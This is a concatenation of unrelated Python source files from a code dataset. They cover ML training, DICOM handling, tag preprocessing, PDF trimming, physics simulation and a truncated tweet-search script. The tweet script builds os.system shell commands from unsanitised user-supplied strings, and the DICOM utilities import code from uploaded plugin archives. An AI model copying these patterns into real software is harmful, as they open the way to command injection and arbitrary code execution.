\"tensorboard/{}\".format(args.tensorboard_id)).json()\n print(render.format_object_as_yaml(res_json[\"config\"]))\n\n\n# fmt: off\n\nargs_description = [\n Cmd(\"tensorboard\", None, \"manage TensorBoard instances\", [\n Cmd(\"list ls\", list_tensorboards, \"list TensorBoard instances\", [\n Arg(\"-q\", \"--quiet\", action=\"store_true\",\n help=\"only display the IDs\"),\n Arg(\"--all\", \"-a\", action=\"store_true\",\n help=\"show all TensorBoards (including other users')\")\n ], is_default=True),\n Cmd(\"start\", start_tensorboard, \"start new TensorBoard instance\", [\n Arg(\"experiment_ids\", type=int, nargs=\"*\",\n help=\"experiment IDs to load into TensorBoard. At most 100 trials from \"\n \"the specified experiment will be loaded into TensorBoard. If the \"\n \"experiment has more trials, the 100 best-performing trials will \"\n \"be used.\"),\n Arg(\"--config-file\", default=None, type=FileType(\"r\"),\n help=\"command config file (.yaml)\"),\n Arg(\"-t\", \"--trial-ids\", nargs=ONE_OR_MORE, type=int,\n help=\"trial IDs to load into TensorBoard; at most 100 trials are \"\n \"allowed per TensorBoard instance\"),\n Arg(\"--no-browser\", action=\"store_true\",\n help=\"don't open TensorBoard in a browser after startup\"),\n Arg(\"-d\", \"--detach\", action=\"store_true\",\n help=\"run in the background and print the ID\")\n ]),\n Cmd(\"config\", tensorboard_config,\n \"display TensorBoard config\", [\n Arg(\"tensorboard_id\", type=str, help=\"TensorBoard ID\")\n ]),\n Cmd(\"open\", open_tensorboard,\n \"open existing TensorBoard instance\", [\n Arg(\"tensorboard_id\", help=\"TensorBoard ID\")\n ]),\n Cmd(\"logs\", tail_tensorboard_logs, \"fetch TensorBoard instance logs\", [\n Arg(\"tensorboard_id\", help=\"TensorBoard ID\"),\n Arg(\"-f\", \"--follow\", action=\"store_true\",\n help=\"follow the logs of a TensorBoard instance, \"\n \"similar to tail -f\"),\n Arg(\"--tail\", type=int, default=200,\n help=\"number of lines to show, counting from the end \"\n \"of the log\")\n ]),\n Cmd(\"kill\", kill_tensorboard, \"kill TensorBoard instance\", [\n Arg(\"tensorboard_id\", help=\"TensorBoard ID\", nargs=ONE_OR_MORE),\n Arg(\"-f\", \"--force\", action=\"store_true\", help=\"ignore errors\"),\n ]),\n ])\n] # type: List[Any]\n\n# fmt: on\n","sub_path":"cli/determined_cli/tensorboard.py","file_name":"tensorboard.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"395976580","text":"#%%\nimport tensorflow as tf\nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\nfrom tensorflow.keras.applications.resnet50 import ResNet50\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Model\n\nimport numpy as np\nimport splitfolders\n\nfrom helper import Helper\n\n#%% Setup\n\nDATA_DIR_PATH = \"datasets/main\" # Where the dataset is located.\nOUTPUT_DIR = \"datasets/split_images\" # Where to save the trian, val, and test sets.\n\nSEED = 22\n\nTRAIN_R = 0.7 # Train ratio\nVAL_R = 0.2\nTEST_R = 0.1\n\n\nEPOCHS = 200\nMODEL_NAME = \"vtc_final_model\"\n\nBATCH_SIZE = 32\nIMG_SHAPE = (224, 224, 3)\n\n\n# Data augmentation\nD_AUG = True\nROTATION = 10\nWIDTH_SHIFT = 0.2\nHEIGHT_SHIFT = 0.2\nBRIGHTNESS = (0.2, 1.4)\nSHEAR = 0.2\nZOOM = 0.3\nHORI_FLIP = True\n\n\n# To split the dataset into train, val, and test sets.\nsplitfolders.ratio(DATA_DIR_PATH, OUTPUT_DIR, seed=SEED, ratio=(TRAIN_R, VAL_R, 
TEST_R))\n\ntrain_data_dir = f\"{OUTPUT_DIR}/train\"\nval_data_dir = f\"{OUTPUT_DIR}/val\"\ntest_data_dir = f\"{OUTPUT_DIR}/test\"\n\n\nhelper = Helper()\n\ntrain_gen, val_gen, test_gen = helper.get_resnet_gens(train_data_dir,\n val_data_dir,\n test_data_dir,\n target_size=(IMG_SHAPE[0], IMG_SHAPE[1]),\n batch_size=BATCH_SIZE,\n data_aug=D_AUG,\n rotation=ROTATION,\n width_shift=WIDTH_SHIFT,\n height_shift=HEIGHT_SHIFT,\n brightness=BRIGHTNESS,\n shear=SHEAR,\n zoom=ZOOM,\n hori_flip=HORI_FLIP\n )\n\n\n#%% Creating the model\n\nresnet_model = ResNet50(include_top=False, weights=\"imagenet\", input_shape=IMG_SHAPE, pooling=\"avg\")\n\n# Adding final layers at the end of the model.\nx = resnet_model.output\nx = Dense(32, activation=\"relu\")(x)\n\noutput = Dense(train_gen.num_classes, activation=\"softmax\")(x)\nmodel = Model(inputs=resnet_model.input, outputs=output)\n\n# Freezing the ResNet layers.\nfor layer in resnet_model.layers:\n layer.trainable = False\n \nmodel.compile(\n optimizer=\"adam\",\n loss=\"categorical_crossentropy\",\n metrics=[\"acc\"])\n\nmodel.summary()\n\n#%% Model training\n\nhistory = model.fit(train_gen,\n validation_data=val_gen,\n epochs=EPOCHS)\n\n#%% Test set evaluation\n\nprint(\"\\nTest evaluation:\")\nmodel.evaluate(test_gen)\n\n\n#%% Saving the model\n\nprint(\"\\nSaving model and history...\")\n\nmodel.save(f\"saved_models/{MODEL_NAME}.h5\")\n \nhistory_array = np.array([history.history[\"loss\"],\n history.history[\"acc\"],\n history.history[\"val_loss\"],\n history.history[\"val_acc\"]])\n\nwith open(f\"saved_models/{MODEL_NAME}.npy\", \"wb\") as file:\n np.save(file, history_array)\n \nprint(\"Model and history saved\")\nprint(\"Done\")\n","sub_path":"vtc/VTC_ResNet_training.py","file_name":"VTC_ResNet_training.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"54789405","text":"import os\nfrom tqdm import tqdm\n\nroot_path = '/data3/alexhu/Datasets/AUTSL_Upper/jpg_video/'\nsplit_path = os.listdir(root_path)\nframes = []\n\nfor i in tqdm(range(len(split_path))):\n if split_path[i] != 'val':\n continue\n real_split_path = os.path.join(root_path, split_path[i])\n video_path = os.listdir(real_split_path)\n for j in range(len(video_path)):\n real_video_path = os.path.join(real_split_path, video_path[j])\n frame_path = sorted(os.listdir(real_video_path))\n frames.append(len(frame_path))\n if len(frame_path) < 10:\n print(split_path[i], video_path[j], len(frame_path))\n\nprint('Avg', sum(frames) / float(len(frames)))\nprint('Max', max(frames), 'Min', min(frames))\n","sub_path":"data_arrange/Stage1_Cal_n_frames.py","file_name":"Stage1_Cal_n_frames.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"323765006","text":"import sys\nimport collections\n\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\ninDegree = [0 for _ in range(N + 1)]\ndp = [0 for _ in range(N + 1)]\n\ngraph = collections.defaultdict(list)\nfor _ in range(M):\n A, B = map(int, input().split())\n graph[A].append(B)\n inDegree[B] += 1\n\nqueue = collections.deque()\nfor i in range(1, N + 1):\n if inDegree[i] == 0:\n queue.append(i)\n dp[i] = 1\n\nwhile queue:\n node = queue.popleft()\n for i in graph[node]:\n inDegree[i] -= 1\n dp[i] = max(dp[node] + 1, dp[i])\n if inDegree[i] == 0:\n queue.append(i)\n\nprint(*dp[1:])\n","sub_path":"A-알고리즘 분류/위상정렬/14567_선수과목 
(Prerequisite).py","file_name":"14567_선수과목 (Prerequisite).py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"305209510","text":"# -*- coding:utf-8 -*-\nimport pytest\n\n\ndef _getTarget():\n from miniconfig import ConfiguratorCore\n return ConfiguratorCore\n\n\n@pytest.mark.parametrize(\"current_module, symbol_string, import_symbol\", [\n (\"foo.bar.boo\", \"moo\", \"moo\"),\n (\"foo.bar.boo\", \"moo.moo\", \"moo.moo\"),\n (\"foo.bar.boo\", \".moo\", \"foo.bar.moo\"),\n (\"foo.bar.boo\", \"..moo\", \"foo.moo\"),\n (\"foo.bar.boo\", \".\", \"foo.bar.boo\"),\n (\"foo.bar.boo\", \"..\", \"foo.bar\"),\n])\ndef test_build_import_symbol_string(current_module, symbol_string, import_symbol):\n class module:\n pass\n config = _getTarget()(module=module())\n config.module.__name__ = current_module\n assert config.build_import_symbol_string(symbol_string) == import_symbol\n\n\ndef test_include__function():\n status = [False]\n\n def includeme(config):\n status[0] = True\n\n config = _getTarget()()\n config.include(includeme)\n assert status[0] is True\n\n\ndef test_include__module():\n import imp\n import sys\n\n status = [False]\n\n def includeme(config):\n status[0] = True\n\n module = imp.new_module(\"miniconfig.foo\")\n module.includeme = includeme\n sys.modules[\"miniconfig.foo\"] = module\n\n config = _getTarget()()\n config.include(\"miniconfig.foo\")\n assert status[0] is True\n\n\ndef test_include__module_with_functioname():\n import imp\n import sys\n\n status = [False]\n\n def includeme(config):\n status[0] = True\n\n module = imp.new_module(\"miniconfig.boo\")\n module.myincludeme = includeme\n sys.modules[\"miniconfig.boo\"] = module\n\n config = _getTarget()()\n config.include(\"miniconfig.boo:myincludeme\")\n assert status[0] is True\n","sub_path":"miniconfig/tests/test_include.py","file_name":"test_include.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195824640","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the plusMinus function below.\ndef plusMinus(arr):\n pos = []\n neg = []\n zero = []\n\n for i in arr:\n if i > 0:\n pos.append(i)\n elif i < 0:\n neg.append(i)\n else:\n zero.append(i)\n \n pos_dec = (len(pos) / len(arr))\n neg_dec = (len(neg) / len(arr))\n zero_dec = (len(zero) / len(arr))\n\n print(round(pos_dec, 6))\n print(round(neg_dec, 6))\n print(round(zero_dec, 6))\n\nif __name__ == '__main__':\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n plusMinus(arr)\n","sub_path":"HackerRank/plus-minus.py","file_name":"plus-minus.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415015252","text":"import importlib\nimport json\nfrom json import JSONEncoder\nfrom zipfile import ZipFile\n\nimport sys\n\nimport numpy as np\nfrom PIL import Image\nfrom io import BytesIO\nfrom pydicom import Dataset, Sequence\nfrom pydicom import read_file\nfrom pydicom.dataelem import PersonName\nfrom pydicom.multival import MultiValue\nfrom pydicom.valuerep import DA, DT, TM, DSfloat, DSdecimal, IS\n\nfrom apps.core.models import *\n\n\nclass DicomSaver:\n\n @classmethod\n def save(cls, fp):\n ds: Dataset = read_file(fp)\n if isinstance(fp, str):\n fp = open(fp, 'rb')\n if 
Instance.objects.filter(sop_instance_uid=ds.SOPInstanceUID).exists():\n instance = Instance.objects.get(sop_instance_uid=ds.SOPInstanceUID)\n instance.image.delete()\n instance.image.save('', fp)\n return instance\n elif Series.objects.filter(series_instance_uid=ds.SeriesInstanceUID).exists():\n series = Series.objects.get(series_instance_uid=ds.SeriesInstanceUID)\n instance = Instance.from_dataset(ds=ds)\n instance.series = series\n instance.image.save('', fp)\n instance.save()\n fp.close()\n return instance\n elif Study.objects.filter(study_instance_uid=ds.StudyInstanceUID).exists():\n study = Study.objects.get(study_instance_uid=ds.StudyInstanceUID)\n series = Series.from_dataset(ds=ds)\n series.study = study\n series.save()\n instance = Instance.from_dataset(ds=ds)\n instance.series = series\n instance.image.save('', fp)\n instance.save()\n fp.close()\n return instance\n\n if ds.PatientID is None or ds.PatientID == '':\n patient = Patient.from_dataset(ds=ds)\n patient.save()\n study = Study.from_dataset(ds=ds)\n study.patient = patient\n study.save()\n series = Series.from_dataset(ds=ds)\n series.study = study\n series.save()\n instance = Instance.from_dataset(ds=ds)\n instance.series = series\n instance.image.save('', fp)\n instance.save()\n fp.close()\n return instance\n elif Patient.objects.filter(patient_id=ds.PatientID):\n patient = Patient.objects.get(patient_id=ds.PatientID)\n study = Study.from_dataset(ds=ds)\n study.patient = patient\n study.save()\n series = Series.from_dataset(ds=ds)\n series.study = study\n series.save()\n instance = Instance.from_dataset(ds=ds)\n instance.series = series\n instance.image.save('', fp)\n instance.save()\n fp.close()\n return instance\n else:\n patient = Patient.from_dataset(ds=ds)\n patient.save()\n study = Study.from_dataset(ds=ds)\n study.patient = patient\n study.save()\n series = Series.from_dataset(ds=ds)\n series.study = study\n series.save()\n instance = Instance.from_dataset(ds=ds)\n instance.series = series\n instance.image.save('', fp)\n instance.save()\n fp.close()\n return instance\n\n\nclass DicomProcessor:\n\n @staticmethod\n def process(instance: Instance, plugin: Plugin, **params):\n ds = read_file(instance.image)\n plugin_path = plugin.plugin.path\n sys.path.append(plugin_path)\n importlib.invalidate_caches()\n with ZipFile(plugin.plugin) as zip_file:\n module_name = zip_file.filelist[0].filename\n module_name = module_name.replace('/', '').replace('\\\\', '')\n plugin_module = importlib.import_module(module_name)\n importlib.reload(plugin_module)\n plugin_processor = plugin_module.Plugin()\n plugin_processor.init()\n result = plugin_processor.process(ds, **params)\n plugin_processor.destroy()\n sys.path.remove(plugin_path)\n return result\n\n\nclass PluginSaver:\n\n @staticmethod\n def save(plugin: Plugin = None, fp=None):\n if plugin is None:\n plugin = Plugin()\n if isinstance(fp, str):\n fp = open(fp, 'rb')\n with ZipFile(fp) as plugin_archive:\n archive_name = plugin_archive.filelist[0].filename\n meta = plugin_archive.read(os.path.join(archive_name, 'META.json'))\n plugin_meta = json.loads(meta)\n plugin.name = plugin_meta['name']\n plugin.author = plugin_meta['author']\n plugin.version = plugin_meta['version']\n plugin.info = plugin_meta['info']\n plugin.docs = plugin_meta['docs']\n plugin.params = plugin_meta.get('params', None)\n plugin.result = plugin_meta['result']\n plugin.tags = plugin_meta.get('tags', None)\n plugin.modalities = plugin_meta.get('modalities', None)\n plugin.plugin.save('', fp)\n plugin.save()\n 
return plugin\n\n\nclass DicomJsonEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, PersonName):\n return obj.original_string\n if isinstance(obj, MultiValue) or isinstance(obj, Sequence):\n return_list = []\n for value in obj:\n return_list.append(self.default(value))\n return return_list\n if isinstance(obj, DA):\n return '%d-%02d-%02d' % (obj.year, obj.month, obj.day)\n if isinstance(obj, DT):\n return '%d-%02d-%02d %02d:%02d:%02d' % (obj.year, obj.month, obj.day, obj.hour, obj.minute, obj.second)\n if isinstance(obj, TM):\n return '%02d:%02d:%02d' % (obj.hour, obj.minute, obj.second)\n if isinstance(obj, DSfloat):\n return str(obj)\n if isinstance(obj, DSdecimal):\n return str(obj)\n if isinstance(obj, IS):\n return obj.original_string or str(obj)\n if isinstance(obj, Dataset):\n child_tags = obj.dir()\n return_dict = {}\n for tag in child_tags:\n return_dict[tag] = self.default(obj.data_element(tag).value)\n return return_dict\n return str(obj)\n\n\ndef convert_dicom_to_img(ds: Dataset, img_format='jpeg'):\n return convert_array_to_img(ds.pixel_array, img_format=img_format)\n\n\ndef convert_array_to_img(pixel_array: np.ndarray, img_format='jpeg'):\n orig_shape = pixel_array.shape\n flatten_img = pixel_array.reshape((-1))\n img_min = min(flatten_img)\n img_max = max(flatten_img)\n # shift values so the minimum maps to 0 before scaling into the 0..255 range\n flatten_img = np.floor_divide(flatten_img - img_min, (img_max - img_min + 1) / 256, casting='unsafe')\n img = flatten_img.astype(dtype=np.uint8).reshape(orig_shape)\n img = Image.fromarray(img)\n file = BytesIO()\n img.save(file, format=img_format)\n file.seek(0)\n return file.read()\n","sub_path":"neurdicom/apps/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"578894693","text":"import numpy as np\nimport pandas as pd\nimport os\nimport re\nfrom ast import literal_eval\n\ndfs = []\n\n# import all data-frames\nfor filename in os.listdir(\"raw/\") :\n dfs.append(pd.read_csv(\"raw/\" + filename))\n\nkey_word = [\n\"m/m\",\n\"f/m\",\n\"f/f\",\n\"gen\",\n\"multi\",\n\"other\",\n\"happy ending\",\n\"bad ending\",\n\"angst\",\n\"fluff\",\n\"humor\",\n\"smut\",\n\"hurt/comfort\",\n\"time travel\",\n]\n\nsynonyms = {\n\"au\" : \"alternate universe\",\n\"a/b/o\" : \"alpha/beta/omega dynamics\",\n\"abo\" : \"alpha/beta/omega dynamics\",\n\"a/b/o dynamics\" : \"alpha/beta/omega dynamics\",\n\"abo dynamics\" : \"alpha/beta/omega dynamics\",\n}\n\nall_tags_count = {}\ntags_fandoms_counter = {}\n\nfor df in dfs :\n fandom_id = df[\"fandom\"][0]\n #print(fandom_id)\n for i, tags in df[\"tags\"].iteritems() :\n try :\n tags_set = literal_eval(tags)\n except :\n print(tags)\n\n # delete unwanted symbols from every tag (rebuild the set)\n tags_set = {re.sub(r\"[\\?\\!\\.\\,]\", \"\", tag) for tag in tags_set}\n\n # extract key_word from sub tags\n # and delete key_word divergent tags\n tags_to_add = set()\n tags_to_remove = set()\n for tag in tags_set :\n found_key = set()\n for key in key_word :\n if tag.find(key) != -1 :\n found_key.add(key)\n if len(found_key) > 1:\n tags_to_remove.add(tag)\n tags_to_add.update(found_key)\n tags_set = tags_set - tags_to_remove\n tags_set = tags_set | tags_to_add\n \n # replace tags with synonyms\n for nym in synonyms.keys() :\n if nym in tags_set :\n tags_set.remove(nym)\n if not synonyms[nym] in tags_set :\n tags_set.add(synonyms[nym])\n \n # save preprocessed tags\n df.at[i, \"tags\"] = str(tags_set)\n \n for tag in tags_set :\n # record tags occurrence in fandom\n if tag in 
tags_fandoms_counter :\n if not fandom_id in tags_fandoms_counter[tag] :\n tags_fandoms_counter[tag].append(fandom_id)\n else :\n tags_fandoms_counter[tag] = list((fandom_id, ))\n \n # record tags total occurrence count\n if tag in all_tags_count :\n all_tags_count[tag] += 1\n else :\n all_tags_count[tag] = 1\n\n# decide min_remove_count\ncounts = [all_tags_count[key] for key in all_tags_count]\nmin_remove_count = 50 #20 #int(np.mean(counts) + 1)\n\nprint(\"before tags count:\", len(counts))\nprint(\"max count:\", max(counts))\nprint(\"min_remove_count\", min_remove_count)\n\nprint(\"removing tags\")\ntags_to_remove = set([\"other additional tags to be added\", \"no category\"])\nfor df in dfs :\n fandom_id = df[\"fandom\"][0]\n for i, tags in df[\"tags\"].iteritems() :\n tags_set = literal_eval(tags)\n for tag in tags_set :\n if not tag in tags_to_remove :\n # delete tags that only appear in ONE fandom\n #if len(tags_fandoms_counter[tag]) <= 1 :\n # tags_to_remove.append(tag)\n # delete tags that appear less than min\n if all_tags_count[tag] < min_remove_count :\n tags_to_remove.add(tag)\n # end for tags_set\n # end for df[\"tags\"]\n# end for dfs\n\nprint(\"write preprocessed data\")\nfor df in dfs :\n fandom_id = df[\"fandom\"][0]\n for i, tags in df[\"tags\"].iteritems() :\n tags_set = literal_eval(tags)\n tags_set = tags_set - tags_to_remove\n df.at[i, \"tags\"] = str(tags_set)\n df.to_csv(\"train/\" + fandom_id + \".csv\", index = False)\n\n# replace tag strings with numbers\n# since that makes encoding easier\nprint(\"write tag dictionary\")\ntag_dict = {}\ncount = 0\nfor df in dfs :\n for i, tags in df[\"tags\"].iteritems() :\n tags_set = literal_eval(tags)\n for tag in tags_set :\n if not tag in tag_dict :\n tag_dict[tag] = count\n count += 1\nprint(\"after tags count:\", count)\ndict_df = pd.DataFrame([tag_dict])\ndict_df.to_csv(\"tag_dict.csv\", index = False)\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530053942","text":"import os\r\nimport shutil\r\nimport stat\r\nimport sys\r\n\r\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\r\n\r\n\r\ndef deletepagesFromPdf(pdfin, pdfout):\r\n with open(pdfin, 'rb') as f:\r\n pdf_src = PdfFileReader(f)\r\n ipages = pdf_src.getNumPages()\r\n print(\"Original PDF Pages: %d\" % ipages)\r\n skip_page_1 = False\r\n skip_page_last = False\r\n\r\n page2detect_1st = pdf_src.getPage(1)\r\n if page2detect_1st.mediaBox[2] == 960 and page2detect_1st.mediaBox[3] == 540:\r\n skip_page_1 = True\r\n page2detect_2nd = pdf_src.getPage(ipages-1)\r\n print(\"mediabox %s\" % page2detect_2nd.mediaBox)\r\n if page2detect_2nd.mediaBox[2] == 294.24 and page2detect_2nd.mediaBox[3] == 206.4:\r\n skip_page_last = True\r\n\r\n pdf_out = PdfFileWriter()\r\n pdf_out.addPage(pdf_src.getPage(0))\r\n fromindex = 1\r\n toindex = ipages-1\r\n if skip_page_1:\r\n fromindex = 2\r\n if skip_page_last:\r\n toindex = ipages-2\r\n for i in range(fromindex, toindex):\r\n pdf_out.addPage(pdf_src.getPage(i))\r\n with open(pdfout, 'wb') as fo:\r\n pdf_out.write(fo)\r\n\r\n\r\nif __name__ == '__main__':\r\n print('Cleaning up PDF files in the current directory')\r\n current_dir = os.path.dirname(sys.argv[0])\r\n os.chdir(current_dir)\r\n files = [f for f in os.listdir(current_dir) if (\".pdf\" in f)]\r\n\r\n for f in files:\r\n print(\"Processing file: %s\" % f)\r\n os.chmod(f, stat.S_IWRITE)\r\n try:\r\n if \"2019\" in f:\r\n deletepagesFromPdf(current_dir+\"/\"+f, 
current_dir+\"/2019/\"+f)\r\n if \"2018\" in f:\r\n deletepagesFromPdf(current_dir+\"/\"+f, current_dir+\"/2018/\"+f)\r\n if \"2017\" in f:\r\n deletepagesFromPdf(current_dir+\"/\"+f, current_dir+\"/2017/\"+f)\r\n if \"2016\" in f:\r\n deletepagesFromPdf(current_dir+\"/\"+f, current_dir+\"/2016/\"+f)\r\n if \"2015\" in f:\r\n deletepagesFromPdf(current_dir+\"/\"+f, current_dir+\"/2015/\"+f)\r\n os.remove(f)\r\n except Exception as e:\r\n print(\"处理失败 %s\" % e)\r\n","sub_path":"5.trimPDF/trimpdf.py","file_name":"trimpdf.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"249101737","text":"from django.urls import path\nfrom .views import FilterMovment, MovementListToday, MovmentListLastWeek, ShowFilterMovment\nfrom django.contrib.auth.decorators import login_required\n\napp_name = 'sensor'\n\nurlpatterns = [\n path('filter', login_required(FilterMovment.as_view()), name='movment-filter'),\n path('list', login_required(MovementListToday.as_view()), name='movment-list'),\n path('lastweeklist', login_required(MovmentListLastWeek.as_view()), name='movment-lastweek-list'),\n path('todaymovment', login_required(ShowFilterMovment.as_view()), name='movment-today'),\n\n\n\n]","sub_path":"sensor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"639377244","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division\nimport math\nimport numpy as np\nimport scipy as sp\nimport pandas\nimport matplotlib.pyplot as plt\nfrom progressbar import ProgressBar\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import linalg as sparse_linalg\nimport sys\nfile_dir = '/localhome/pykb/physics_code/Exact_Diagonalization/Classes/'\nsys.path.append(file_dir)\nfile_dir = '/localhome/pykb/physics_code/Exact_Diagonalization/functions/'\nsys.path.append(file_dir)\n\nfrom Hamiltonian_Classes import Hamiltonian,H_table,clock_Hamiltonian,spin_Hamiltonian\nfrom System_Classes import unlocking_System,U1_system\nfrom Symmetry_Classes import translational,parity,model_sym_data,charge_conjugation\n# from Plotting_Classes import eig_overlap,fidelity,entropy,energy_basis\nfrom Non_observables import zm\nfrom Construction_functions import bin_to_int_base_m,int_to_bin_base_m,cycle_bits_state\nfrom Search_functions import find_index_bisection\nfrom State_Classes import zm_state,sym_state,prod_state,bin_state,ref_state\nfrom rw_functions import save_obj,load_obj\nfrom Calculations import level_stats,fidelity,eig_overlap,entropy,site_precession,site_projection,time_evolve_state\n\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Computer Modern'],'size':26})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n# matplotlib.rcParams['figure.dpi'] = 400\n\ndef spin_chain_tb_H(L):\n S=L/2\n m=np.arange(-S,S)\n couplings = np.power(S*(S+1)-m*(m+1),0.5)\n return np.diag(couplings,1) + np.diag(couplings,-1)\n\nL=15\nd=3\n\n#generate necessary spin chain H\nbridge_cube_H = spin_chain_tb_H(L-2)\nmain_cube = spin_chain_tb_H(L)\nbridge_dim = int(np.size(bridge_cube_H,axis=0))\nmain_dim = int(np.size(main_cube,axis=0))\n\n# #build block diagonal matrix, keep pair of indices for coupled sites + there coupling value\ndim_total = 2*main_dim-1\ndim_total = dim_total + 
(L+1-3)*(bridge_dim-2)\nH=np.zeros((dim_total,dim_total))\n\n# #two largest cubes coupled at pol\nH_two_cubes = np.zeros((2*main_dim-1,2*main_dim-1))\nH_two_cubes[:main_dim,:main_dim] = main_cube\nH_two_cubes[main_dim-1:,main_dim-1:] = main_cube\n\nH[:np.size(H_two_cubes,axis=0),:np.size(H_two_cubes,axis=0)] = H_two_cubes\n\n# get loc of start/end states of cube bridges\nbridge_pos = np.zeros((L+1-3,2),dtype=int)\nfor n in range(2,L):\n bridge_pos[n-2,0] = n\n bridge_pos[n-2,1] = n+L-1\nprint(bridge_pos)\n\ncurrent_index = np.size(H_two_cubes,axis=0)\nblock_H = np.copy(bridge_cube_H)\n\nplt.matshow(H)\nplt.show()\n\n# insert cube bridges, with last two couplings being at bridge pos\nblock_H = np.copy(bridge_cube_H)\nedge_coupling = bridge_cube_H[0,1]\n#trim first couplings (insert by hand with loc on main cube)\nblock_H = np.delete(block_H,np.size(block_H,axis=0)-1,axis=0)\nblock_H = np.delete(block_H,np.size(block_H,axis=1)-1,axis=1)\nblock_H = np.delete(block_H,0,axis=0)\nblock_H = np.delete(block_H,0,axis=1)\ndim = np.size(block_H,axis=0)\n\nfor n in range(0,np.size(bridge_pos,axis=0)):\n H[current_index:current_index+dim,current_index:current_index+dim] = block_H\n\n H[current_index,bridge_pos[n,0]] = edge_coupling\n H[bridge_pos[n,0],current_index] = edge_coupling\n\n right_edge_index = current_index + dim -1\n\n H[right_edge_index,bridge_pos[n,1]] = edge_coupling\n H[bridge_pos[n,1],right_edge_index] = edge_coupling\n\n current_index = current_index + dim\n\nplt.matshow(H)\nplt.show()\nprint(\"Dim=\"+str(dim_total))\ne,u = np.linalg.eigh(H)\nprint(\"Found eig\")\n\nt=np.arange(0,20,0.01)\npsi_energy = np.conj(u[0,:])\nf=np.zeros(np.size(t))\nfor n in range(0,np.size(t,axis=0)):\n evolved_state = time_evolve_state(psi_energy,e,t[n])\n f[n] = np.abs(np.vdot(evolved_state,psi_energy))**2\nplt.plot(t,f)\nplt.xlabel(r\"$t$\")\nplt.ylabel(r\"$\\vert \\langle 0_L \\vert e^{-iHt} \\vert 0_L \\rangle \\vert^2$\")\nplt.title(r\"$\\textrm{Cube Bridges Phenomenological model, Unequal bridge length}$, L=\"+str(L)+\", d=\"+str(d))\nplt.show()\n","sub_path":"projects/embedded_cube_phen_models/cube_bridge_phen_model_pxp_bridges.py","file_name":"cube_bridge_phen_model_pxp_bridges.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"403149948","text":"import os\nimport datetime, time, json, csv, jsonify, subprocess\nfrom collections import Counter\n\ndef buscarTweets(busqueda='',hashtag='',usuario='', fecha_min='', cerca=''):\n path_script = os.path.abspath(\"Exporter.py\")\n fecha=datetime.datetime.now()\n year=fecha.year\n month=fecha.month\n day=fecha.day\n hashtag=hashtag.replace(\"#\",\"\").replace(\" \",\"\")\n filename=''\n if(fecha_min==''):\n f1=\"\"+str(year)+\"-\"+str(month)+\"-\"+str(day)\n else:\n f1=fecha_min.replace('/','-')\n f2=\"\"+str(year)+\"-\"+str(month-1)+\"-\"+str(day)\n if(cerca==''):\n cercania='global'\n else:\n cercania=cerca\n if(busqueda != ''):\n if(hashtag != ''):\n filename=busqueda.replace(\" \",\"\")+hashtag.replace(\"#\",\"\").replace(\" \",\"\")\n busqueda=busqueda.replace(\" \",\"\")+\" \"+hashtag.replace(\"#\",\"\").replace(\" \",\"\")\n os.system(\"python3 \"+path_script+\" --querysearch '\"+busqueda+\"'\"+\" --near \"+cercania+\" --lang es\")\n elif(hashtag == ''):\n filename=busqueda.replace(\" \",\"\")\n os.system(\"python3 \"+path_script+\" --querysearch '\"+busqueda+\"'\"+\" --near \"+cercania+\" --lang es\")\n elif(busqueda == ''):\n if(hashtag != 
